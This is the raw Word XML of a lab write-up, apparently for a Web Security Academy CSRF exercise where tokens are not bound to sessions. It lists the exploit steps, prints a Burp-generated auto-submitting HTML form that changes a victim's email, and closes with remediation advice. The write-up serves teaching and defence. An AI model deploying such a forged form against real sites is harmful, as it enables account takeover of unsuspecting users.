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64D88685"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w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>consists of an email change functionality which is vulnerable to CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00466759">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B6F7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>even though some security controls are implemented but those tokens are not tied to any session</w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. We will try to mount an exploit and deliver it to the target with the help of an exploit server</w:t>
      </w:r>
      <w:r w:rsidR="005B750D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to change the email address of the target.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7067F2A5" w14:textId="19D7D090" w:rsidR="001007B5" w:rsidRDefault="007F5950"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w:t>
      </w:r>
      <w:r w:rsidR="0038106E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the vulnerable web applications</w:t>
      </w:r>
      <w:r w:rsidR="0033120F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E31496">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and log in with the username and password </w:t>
      </w:r>
      <w:r w:rsidR="002E07F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">of Wiener’s account </w:t>
      </w:r>
      <w:r w:rsidR="00E31496">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">provided to act as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00840938">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E31496">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03325C92" w14:textId="4A2C8E91" w:rsidR="00E31496" w:rsidRDefault="0084093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change the email once to study the HTTP request and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321D4B46" w14:textId="5ABF91C4" w:rsidR="0052488A" w:rsidRDefault="0052488A"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 tab right click on the request and select Engagement tools and then on generate CSRF PoC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8C67F" w14:textId="0C095EAE" w:rsidR="00BC3984" w:rsidRDefault="00BC3984"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in the dialogue box enable the option to auto-submit script and click Regenerate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E7FFC" w14:textId="55384D51" w:rsidR="009A34DE" w:rsidRDefault="002E07F4" w:rsidP="009A34D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Now, login as the Carlos’s/attacker’s account and inspect the source of the page to get the CSRF token of the attacker</w:t>
      </w:r>
      <w:r w:rsidR="002C24BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and copy it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009A34DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2DF48" w14:textId="08095EDE" w:rsidR="00970BF8" w:rsidRDefault="00970BF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Go to the exploit server and paste the request </w:t>
      </w:r>
      <w:r w:rsidR="00846E37" w:rsidRPr="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">into the body tag of the exploit </w:t>
      </w:r>
      <w:r w:rsidR="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="009A34DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>replace the original token with the attacker’s token</w:t>
      </w:r>
      <w:r w:rsidR="00846E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>then click store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F39F9" w14:textId="0F518690" w:rsidR="00131AF3" w:rsidRDefault="000564D4" w:rsidP="00AF10D6">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At the end, click the button to deliver the exploit to the victim</w:t>
      </w:r>
      <w:r w:rsidR="005657B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, we will see that our POST request gets rejected due to security measures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D062A1D" w14:textId="77777777" w:rsidR="000A306E" w:rsidRDefault="000A306E" w:rsidP="00E050CA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3117D4FE" w14:textId="1F23D745"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1CB266AC"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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03199155"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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF PoC - generated by Burp Suite Professional --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E909E1"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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C9F5C"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&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>history.pushState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>('', '', '/')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA53BF"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&lt;form action="https://0a5f0075038dda8d81483e3d00cf00e2.web-security-academy.net/my-account/change-email" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B8DFB" w14:textId="411B3788"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&lt;input type="hidden" name="email" value="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>rudransh@gmail.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A2B23B"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&lt;input type="submit" value="Submit request" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C7413"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DD34B"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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213FCEA5"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00900668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E76716"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A73FB"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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689156CE" w14:textId="55F05ED7" w:rsidR="006C25F7" w:rsidRPr="006C0B72"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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F744A" w14:textId="24C4D243" w:rsidR="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233F1AF7" w14:textId="42E1A5BB" w:rsidR="00414D5D" w:rsidRDefault="00A446BA" w:rsidP="00414D5D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51CFB4BD" wp14:editId="659FCA54">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>575310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5692775" cy="4267200"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="30585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59319" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5692775" cy="4267200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00414D5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB7A991" w14:textId="4EE8FBD7" w:rsidR="00414D5D" w:rsidRDefault="00A446BA" w:rsidP="00414D5D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B123A6D" wp14:editId="64D8A9B9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4949190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="984250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="119316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5110" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="984250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EAC648" w14:textId="77A9A9BD" w:rsidR="00414D5D" w:rsidRDefault="00414D5D" w:rsidP="00414D5D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC9F024" w14:textId="77777777" w:rsidR="00A446BA" w:rsidRPr="006C0B72" w:rsidRDefault="00A446BA" w:rsidP="00414D5D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6331C2" w14:textId="43F9FDFB"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REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E402968" w14:textId="77777777" w:rsidR="007819F2" w:rsidRPr="007819F2" w:rsidRDefault="007819F2" w:rsidP="007819F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007819F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Bind CSRF Tokens to Sessions:</w:t>
      </w:r>
      <w:r w:rsidRPr="007819F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> It's crucial that each CSRF token is tied directly to a user's session. This binding ensures that even if an attacker manages to get their hands on a CSRF token, they can't employ it within the scope of a different user's session. This approach ensures the user-specificity of tokens, thereby preventing their reuse across varied sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8151DA" w14:textId="77777777" w:rsidR="007819F2" w:rsidRPr="007819F2" w:rsidRDefault="007819F2" w:rsidP="007819F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007819F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Token Unpredictability:</w:t>
      </w:r>
      <w:r w:rsidRPr="007819F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Make sure that the CSRF tokens in use are of significant length, random, and difficult to predict. To achieve this, employ a robust cryptographic algorithm for their generation. Such tokens are robust against potential prediction or brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78AB9B" w14:textId="12EAF773" w:rsidR="002F152E" w:rsidRPr="007819F2" w:rsidRDefault="007819F2" w:rsidP="007819F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007819F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement Referrer Header Checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="007819F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> For each incoming request, validate the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007819F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007819F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>' header. The aim is to ascertain that the request originates from a genuine page of your application and isn't coming from an external or potentially malicious source. This validation acts as another protective layer against CSRF assaults, even though it shouldn't be the only protective mechanism in place.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F152E" w:rsidRPr="007819F2"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04B6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="327AF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FE702B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15E4504E"/>
    <w:lvl w:ilvl="0" w:tplc="EB68B4B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A46BA4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53D2F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6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1806852917">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1019623095">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="152180400">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1129974817">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1883975352">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1664090832">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="7723583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49B5"/>
    <w:rsid w:val="00017B26"/>
    <w:rsid w:val="00017D37"/>
    <w:rsid w:val="000316DD"/>
    <w:rsid w:val="000564D4"/>
    <w:rsid w:val="00087DD8"/>
    <w:rsid w:val="00093FF4"/>
    <w:rsid w:val="000A306E"/>
    <w:rsid w:val="000B5333"/>
    <w:rsid w:val="000D5093"/>
    <w:rsid w:val="000D7CE5"/>
    <w:rsid w:val="000E4A5B"/>
    <w:rsid w:val="000F0291"/>
    <w:rsid w:val="000F4FE7"/>
    <w:rsid w:val="000F5F61"/>
    <w:rsid w:val="001007B5"/>
    <w:rsid w:val="00115586"/>
    <w:rsid w:val="00131AF3"/>
    <w:rsid w:val="00146DDF"/>
    <w:rsid w:val="0014796E"/>
    <w:rsid w:val="0015780E"/>
    <w:rsid w:val="00165B56"/>
    <w:rsid w:val="0016740B"/>
    <w:rsid w:val="001768CB"/>
    <w:rsid w:val="00193EED"/>
    <w:rsid w:val="001B6F7D"/>
    <w:rsid w:val="001E0828"/>
    <w:rsid w:val="001E5754"/>
    <w:rsid w:val="001E5BF4"/>
    <w:rsid w:val="001E698E"/>
    <w:rsid w:val="001F222F"/>
    <w:rsid w:val="001F478F"/>
    <w:rsid w:val="00206207"/>
    <w:rsid w:val="00212AC8"/>
    <w:rsid w:val="002207B3"/>
    <w:rsid w:val="0022338E"/>
    <w:rsid w:val="00226D86"/>
    <w:rsid w:val="00245816"/>
    <w:rsid w:val="00247E82"/>
    <w:rsid w:val="002519AC"/>
    <w:rsid w:val="0026137F"/>
    <w:rsid w:val="00262D06"/>
    <w:rsid w:val="0028480B"/>
    <w:rsid w:val="00290689"/>
    <w:rsid w:val="002A1A1E"/>
    <w:rsid w:val="002A5040"/>
    <w:rsid w:val="002A7B99"/>
    <w:rsid w:val="002B0D4E"/>
    <w:rsid w:val="002C1EC0"/>
    <w:rsid w:val="002C24BB"/>
    <w:rsid w:val="002D2C78"/>
    <w:rsid w:val="002E07F4"/>
    <w:rsid w:val="002F152E"/>
    <w:rsid w:val="002F3625"/>
    <w:rsid w:val="002F54EB"/>
    <w:rsid w:val="0030439C"/>
    <w:rsid w:val="00317C2D"/>
    <w:rsid w:val="003202F7"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="0033120F"/>
    <w:rsid w:val="003358E4"/>
    <w:rsid w:val="0036197C"/>
    <w:rsid w:val="00380DB3"/>
    <w:rsid w:val="0038106E"/>
    <w:rsid w:val="00385CF9"/>
    <w:rsid w:val="00392C30"/>
    <w:rsid w:val="003978F4"/>
    <w:rsid w:val="003A5F44"/>
    <w:rsid w:val="003C1DDC"/>
    <w:rsid w:val="003D523D"/>
    <w:rsid w:val="00414D5D"/>
    <w:rsid w:val="00437C9B"/>
    <w:rsid w:val="00454915"/>
    <w:rsid w:val="00466759"/>
    <w:rsid w:val="00482A06"/>
    <w:rsid w:val="00495017"/>
    <w:rsid w:val="004C039A"/>
    <w:rsid w:val="004C075B"/>
    <w:rsid w:val="004C3608"/>
    <w:rsid w:val="004C37DD"/>
    <w:rsid w:val="004E26E8"/>
    <w:rsid w:val="005036F1"/>
    <w:rsid w:val="00513F5E"/>
    <w:rsid w:val="0052488A"/>
    <w:rsid w:val="00532A89"/>
    <w:rsid w:val="00554D32"/>
    <w:rsid w:val="00557B86"/>
    <w:rsid w:val="005657B0"/>
    <w:rsid w:val="0057090A"/>
    <w:rsid w:val="00572214"/>
    <w:rsid w:val="00591996"/>
    <w:rsid w:val="0059201C"/>
    <w:rsid w:val="005A5FE5"/>
    <w:rsid w:val="005B588A"/>
    <w:rsid w:val="005B750D"/>
    <w:rsid w:val="005C275F"/>
    <w:rsid w:val="005C5A61"/>
    <w:rsid w:val="005E6AA5"/>
    <w:rsid w:val="005E7D42"/>
    <w:rsid w:val="006009AF"/>
    <w:rsid w:val="00620059"/>
    <w:rsid w:val="00626274"/>
    <w:rsid w:val="00631DB6"/>
    <w:rsid w:val="00640BC6"/>
    <w:rsid w:val="00644335"/>
    <w:rsid w:val="00675428"/>
    <w:rsid w:val="00682DCE"/>
    <w:rsid w:val="00686C72"/>
    <w:rsid w:val="00692320"/>
    <w:rsid w:val="006B684D"/>
    <w:rsid w:val="006B7049"/>
    <w:rsid w:val="006C0B72"/>
    <w:rsid w:val="006C25F7"/>
    <w:rsid w:val="006C26C7"/>
    <w:rsid w:val="006E57C3"/>
    <w:rsid w:val="00705B8A"/>
    <w:rsid w:val="00713B95"/>
    <w:rsid w:val="007236F6"/>
    <w:rsid w:val="007244DD"/>
    <w:rsid w:val="0074089A"/>
    <w:rsid w:val="00774583"/>
    <w:rsid w:val="007819F2"/>
    <w:rsid w:val="00782EF7"/>
    <w:rsid w:val="00792BB3"/>
    <w:rsid w:val="007977EA"/>
    <w:rsid w:val="007B5BBE"/>
    <w:rsid w:val="007C289E"/>
    <w:rsid w:val="007F5950"/>
    <w:rsid w:val="008264C3"/>
    <w:rsid w:val="00840938"/>
    <w:rsid w:val="00846E37"/>
    <w:rsid w:val="00857CA7"/>
    <w:rsid w:val="0086200C"/>
    <w:rsid w:val="00864B78"/>
